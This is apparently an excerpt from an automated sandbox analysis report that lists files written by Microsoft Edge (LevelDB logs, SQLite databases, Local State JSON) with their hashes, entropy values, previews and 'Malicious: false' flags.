SSDEEP:	6:BMcJL+q2P923oH+Tcwt7Uh2ghZIFUt84McJ7Zmw+4Mcn4VkwO923oH+Tcwt7Uh2w:ZJyv4YebIhHh2FUt8sJ7/+snw5LYebIT
MD5:	4F69BB29EAAC83DA8ADF72BFC6DC6BAE
SHA1:	61A2DEF0F7FA2C65AF3C45B6BF5225A01923E358
SHA-256:	A0C978BEFFFA6FFFFF84A9BE87B99BD6DCD53A123FA19395689C850193E13440
SHA-512:	18C82029411208C4AC16B5A433EF07BE22762224C31333CB6725AA770963CB27498D5FDAACD2C3E1C10E9B6ED66F61F36A4CB0B6142641BD5580189BF3CA6DF1
Malicious:	false
Preview:	2024/07/26-11:57:12.501 1dd8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/07/26-11:57:12.501 1dd8 Recovering log #3.2024/07/26-11:57:12.502 1dd8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.159778618815549
Encrypted:	false
SSDEEP:	6:BMcJL+q2P923oH+Tcwt7Uh2ghZIFUt84McJ7Zmw+4Mcn4VkwO923oH+Tcwt7Uh2w:ZJyv4YebIhHh2FUt8sJ7/+snw5LYebIT
MD5:	4F69BB29EAAC83DA8ADF72BFC6DC6BAE
SHA1:	61A2DEF0F7FA2C65AF3C45B6BF5225A01923E358
SHA-256:	A0C978BEFFFA6FFFFF84A9BE87B99BD6DCD53A123FA19395689C850193E13440
SHA-512:	18C82029411208C4AC16B5A433EF07BE22762224C31333CB6725AA770963CB27498D5FDAACD2C3E1C10E9B6ED66F61F36A4CB0B6142641BD5580189BF3CA6DF1
Malicious:	false
Preview:	2024/07/26-11:57:12.501 1dd8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/07/26-11:57:12.501 1dd8 Recovering log #3.2024/07/26-11:57:12.502 1dd8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	434
Entropy (8bit):	5.263935424859276
Encrypted:	false
SSDEEP:	6:BMunt+q2P923oH+TcwtzjqEKj3K/2jMGIFUt84MuIXZmw+4MuGDVkwO923oH+Tcd:/ov4YebvqBQFUt8b/+bJ5LYebvqBvJ
MD5:	96FE7A4A4292A281626B96B3789DFB78
SHA1:	2B2199FE96638D98F95D41D2EBC932E4119C3203
SHA-256:	A0B20A27DE87C5B1D594253891B291A825A97C234D785535DCA23A951A975A9B
SHA-512:	F39CE8D775A99283E38DE7D4E849226B0B4480ACCE6981393C5AEA14B66BF02442CC9067BBBCF2A372AD6B292E4FF6D57601FC5CC008D02707E60F00E6837F59
Malicious:	false
Preview:	2024/07/26-11:57:13.535 1f08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/07/26-11:57:13.536 1f08 Recovering log #3.2024/07/26-11:57:13.547 1f08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	434
Entropy (8bit):	5.263935424859276
Encrypted:	false
SSDEEP:	6:BMunt+q2P923oH+TcwtzjqEKj3K/2jMGIFUt84MuIXZmw+4MuGDVkwO923oH+Tcd:/ov4YebvqBQFUt8b/+bJ5LYebvqBvJ
MD5:	96FE7A4A4292A281626B96B3789DFB78
SHA1:	2B2199FE96638D98F95D41D2EBC932E4119C3203
SHA-256:	A0B20A27DE87C5B1D594253891B291A825A97C234D785535DCA23A951A975A9B
SHA-512:	F39CE8D775A99283E38DE7D4E849226B0B4480ACCE6981393C5AEA14B66BF02442CC9067BBBCF2A372AD6B292E4FF6D57601FC5CC008D02707E60F00E6837F59
Malicious:	false
Preview:	2024/07/26-11:57:13.535 1f08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/07/26-11:57:13.536 1f08 Recovering log #3.2024/07/26-11:57:13.547 1f08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.3886039372934488
Encrypted:	false
SSDEEP:	24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
MD5:	DEA619BA33775B1BAEEC7B32110CB3BD
SHA1:	949B8246021D004B2E772742D34B2FC8863E1AAA
SHA-256:	3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
SHA-512:	7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\b3f8668d-d144-44c4-af87-40acbc1b04ad.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.241115989580113
Encrypted:	false
SSDEEP:	6:BMQW3+q2P923oH+TcwtpIFUt84MQWXZmw+4MQW3VkwO923oH+Tcwta/WLJ:rv4YebmFUt85/+T5LYebaUJ
MD5:	36C1C60A724D09519CE93671967DFCAF
SHA1:	62F373E5567B368C49F479708B11F3DAD87DF3E5
SHA-256:	9F8EB4EE6AACC7BDADEDCA1F65B1CDFF0AC370DE19E6F87E0AC8CDB9C5C2B4A6
SHA-512:	5238817479A3037F1F1A0D92B0F2729A7B827B10F3CF8FC4B707D5159286B753C3CE3D18DFAC9F1FD77BC332E3870957920CAFCABCD61B035E756CB4DE7F5910
Malicious:	false
Preview:	2024/07/26-11:57:12.476 1dd8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/07/26-11:57:12.476 1dd8 Recovering log #3.2024/07/26-11:57:12.476 1dd8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.241115989580113
Encrypted:	false
SSDEEP:	6:BMQW3+q2P923oH+TcwtpIFUt84MQWXZmw+4MQW3VkwO923oH+Tcwta/WLJ:rv4YebmFUt85/+T5LYebaUJ
MD5:	36C1C60A724D09519CE93671967DFCAF
SHA1:	62F373E5567B368C49F479708B11F3DAD87DF3E5
SHA-256:	9F8EB4EE6AACC7BDADEDCA1F65B1CDFF0AC370DE19E6F87E0AC8CDB9C5C2B4A6
SHA-512:	5238817479A3037F1F1A0D92B0F2729A7B827B10F3CF8FC4B707D5159286B753C3CE3D18DFAC9F1FD77BC332E3870957920CAFCABCD61B035E756CB4DE7F5910
Malicious:	false
Preview:	2024/07/26-11:57:12.476 1dd8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/07/26-11:57:12.476 1dd8 Recovering log #3.2024/07/26-11:57:12.476 1dd8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.006708043521710664
Encrypted:	false
SSDEEP:	3:ImtVzAAR+WFpllSFBJmZlmYKel/:IiVzAAfzlbbpN
MD5:	C77B2AD698F7580500DBDD018FFF03E1
SHA1:	5140AFCF0B5B6D0FF48743755A02E0FA7E376232
SHA-256:	253576CC0D4B4D2D2A12CDC8D223197805D322C6D1A3D4C97A450955ACC9F629
SHA-512:	B99024F5744A756D7AE32FFE0B6E65CBC4A2A10503C28A57FE669685554569D962799415C8B19D035BADBD76589F0C77968505DD2938A4188F98A7BF14C3A30F
Malicious:	false
Preview:	VLnk.....?......?......+................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.2650085343769042
Encrypted:	false
SSDEEP:	384:8/2qOB1nxCkMkSAELyKOMq+8yC8F/YfU5m+OlTLVumN:Bq+n0Jk9ELyKOMq+8y9/Owy
MD5:	3A43573E18F6E1C4AC3F1271C4D7952F
SHA1:	4F84CDA573CB9A7EBF38CA3F9F791F8519E4BF74
SHA-256:	0B5EC2801CE1CD5A35DE8DF53A8416EDC94E2F063B05DED48A59C8AF09331053
SHA-512:	7AA7B28897951B1AA34F6F768050E383FBF0C84211B50ECAEFE185BC6667A01DB2C82D2C25F7E3B44653021708D95BE92E28ECC931B6D1BC7C55291BBAC244ED
Malicious:	false
Preview:	SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.08581737038683598
Encrypted:	false
SSDEEP:	6:GWlEtutQ8OalEtutQ8OyeL9XCChslotGLNl0ml/Vl/Vl/Unnkl/Vl/Vl/Vl/Vl/M:7t+ot+yOpEjVl/PnnnnnnvoQppxD
MD5:	DFBD8E5CED68AD6FE931EE38799631FF
SHA1:	1727517A3F35FBB1411539F19585C11CF9D5AAEE
SHA-256:	A446B7E3D90A3DD7CAD8514B169C31464B2FDCC8F33338D038BE6B4A565D30F5
SHA-512:	7AAD737F2DB1E069DA8F72AC20971C7FABE792BE3231A239C3744929C2352BAE060B88DB27F722DCFE654CBBF5882EC7B137D77F1C6161C97EF74D7C36CCA922
Malicious:	false
Preview:	..-.............9............=p..4..}......gB:..-.............9............=p..4..}......gB:........5...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	dropped
Size (bytes):	234872
Entropy (8bit):	0.7054804931925269
Encrypted:	false
SSDEEP:	192:jt7/02b2oMqvQE7NPBW/+H7JPXXpJzB32dpJ4BH4gY1dpJgBJnt1dpJCBD:G2TNPBWA9/X7t3k7Yo7A77qD
MD5:	E34BB9E08E62D58AA7610EFCCD23E794
SHA1:	97D4C4E6BCFF4830AC29B7C33BE605937BCFFFC7
SHA-256:	9E09745D8D4B971B2DC331312DCD3354FB9E6DBD714367931E78A5C22D1BC99D
SHA-512:	D85852D722C502D5F8F59243BD7E65958B66920A3109EC36476B5A5DBDC3AA475C72352764CBFC8382E42C12AA201EB510DBF916B7273183C7D506E62E38C021
Malicious:	false
Preview:	7....-...........4..}...8.?L.0.........4..}........C.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.267482261532557
Encrypted:	false
SSDEEP:	6:BMuFlC+q2P923oH+TcwtfrK+IFUt84MuFVUq5Zmw+4MuFVUqtVkwO923oH+Tcwt5:Tv4Yeb23FUt8VG/+V65LYeb3J
MD5:	2A1D271DE5C6B682B3BE8E77D132B675
SHA1:	F86788AA4BD8368CC37863F6D437E4692E90F5BA
SHA-256:	9D03069CEAD221BED889C0F723CB2A591690CC84B955FF724B27049031896CB6
SHA-512:	2775FE7BA31BC37F063DE304E9E8FD91691D3A155D96396DBCD2E4523658FD3C26507840404F2185D103AFE66CAE596087CF2AA385C0E71923C129F0F4E1C302
Malicious:	false
Preview:	2024/07/26-11:57:13.061 1d98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/07/26-11:57:13.062 1d98 Recovering log #3.2024/07/26-11:57:13.062 1d98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.267482261532557
Encrypted:	false
SSDEEP:	6:BMuFlC+q2P923oH+TcwtfrK+IFUt84MuFVUq5Zmw+4MuFVUqtVkwO923oH+Tcwt5:Tv4Yeb23FUt8VG/+V65LYeb3J
MD5:	2A1D271DE5C6B682B3BE8E77D132B675
SHA1:	F86788AA4BD8368CC37863F6D437E4692E90F5BA
SHA-256:	9D03069CEAD221BED889C0F723CB2A591690CC84B955FF724B27049031896CB6
SHA-512:	2775FE7BA31BC37F063DE304E9E8FD91691D3A155D96396DBCD2E4523658FD3C26507840404F2185D103AFE66CAE596087CF2AA385C0E71923C129F0F4E1C302
Malicious:	false
Preview:	2024/07/26-11:57:13.061 1d98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/07/26-11:57:13.062 1d98 Recovering log #3.2024/07/26-11:57:13.062 1d98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	787
Entropy (8bit):	4.059252238767438
Encrypted:	false
SSDEEP:	12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
MD5:	D8D8899761F621B63AD5ED6DF46D22FE
SHA1:	23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
SHA-256:	A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
SHA-512:	4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
Malicious:	false
Preview:	.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J\|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.\|.................9_.....'\c..................9_.......f-.................__global... .\|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.2616367170159295
Encrypted:	false
SSDEEP:	6:BMuz3+q2P923oH+TcwtfrzAdIFUt84MueLZmw+4MulVkwO923oH+TcwtfrzILJ:bOv4Yeb9FUt8h/+G5LYeb2J
MD5:	67B5C4D00DCAB2A2DF909802DC64A3B6
SHA1:	438D7AE1238D6296AA847C5A89684EB8825F8FD3
SHA-256:	52B29292BFE5A54D23E0B0CAE9443D2559E1D926214824180693E05628F76346
SHA-512:	35E0FB84A24F807B79C815522749A8F4C014F4DE9A347D34D05B1074EE6D631B898CA4050D802776DED2A49A9B6BA3995B254CE4CBE78E8CA3BABFE95884F0B8
Malicious:	false
Preview:	2024/07/26-11:57:13.057 1d98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/07/26-11:57:13.058 1d98 Recovering log #3.2024/07/26-11:57:13.059 1d98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.2616367170159295
Encrypted:	false
SSDEEP:	6:BMuz3+q2P923oH+TcwtfrzAdIFUt84MueLZmw+4MulVkwO923oH+TcwtfrzILJ:bOv4Yeb9FUt8h/+G5LYeb2J
MD5:	67B5C4D00DCAB2A2DF909802DC64A3B6
SHA1:	438D7AE1238D6296AA847C5A89684EB8825F8FD3
SHA-256:	52B29292BFE5A54D23E0B0CAE9443D2559E1D926214824180693E05628F76346
SHA-512:	35E0FB84A24F807B79C815522749A8F4C014F4DE9A347D34D05B1074EE6D631B898CA4050D802776DED2A49A9B6BA3995B254CE4CBE78E8CA3BABFE95884F0B8
Malicious:	false
Preview:	2024/07/26-11:57:13.057 1d98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/07/26-11:57:13.058 1d98 Recovering log #3.2024/07/26-11:57:13.059 1d98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.7192945256669794
Encrypted:	false
SSDEEP:	3:NYLFRQI:ap2I
MD5:	BF16C04B916ACE92DB941EBB1AF3CB18
SHA1:	FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
SHA-256:	7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
SHA-512:	F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
Malicious:	false
Preview:	117.0.2045.47

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090733597544953
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBM1wuF9hDO6vP6O++tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEN6/tbz8hu3VlXr4CRo1
MD5:	472F9428CBA06B5B94B5AA1EF68BCA3E
SHA1:	23B009448E5AE52B7AD4ADDE292C0815098901F3
SHA-256:	C2B0B0D02E8225ABF76B72EB7804C50E13F513BD7CF74B9572C3C0D1C19DE17B
SHA-512:	155AF22D3E6B2D8E667BA00431AA3629092B7AB1806F263C74C4B9271CB259966A3483C4C1D13AAF791A89026DF6A1CA37D61CFA4F7EA602F2B0933E6FB120DB
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4271c.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090733597544953
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBM1wuF9hDO6vP6O++tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEN6/tbz8hu3VlXr4CRo1
MD5:	472F9428CBA06B5B94B5AA1EF68BCA3E
SHA1:	23B009448E5AE52B7AD4ADDE292C0815098901F3
SHA-256:	C2B0B0D02E8225ABF76B72EB7804C50E13F513BD7CF74B9572C3C0D1C19DE17B
SHA-512:	155AF22D3E6B2D8E667BA00431AA3629092B7AB1806F263C74C4B9271CB259966A3483C4C1D13AAF791A89026DF6A1CA37D61CFA4F7EA602F2B0933E6FB120DB
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4272b.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090733597544953
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBM1wuF9hDO6vP6O++tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEN6/tbz8hu3VlXr4CRo1
MD5:	472F9428CBA06B5B94B5AA1EF68BCA3E
SHA1:	23B009448E5AE52B7AD4ADDE292C0815098901F3
SHA-256:	C2B0B0D02E8225ABF76B72EB7804C50E13F513BD7CF74B9572C3C0D1C19DE17B
SHA-512:	155AF22D3E6B2D8E667BA00431AA3629092B7AB1806F263C74C4B9271CB259966A3483C4C1D13AAF791A89026DF6A1CA37D61CFA4F7EA602F2B0933E6FB120DB
Malicious:	false
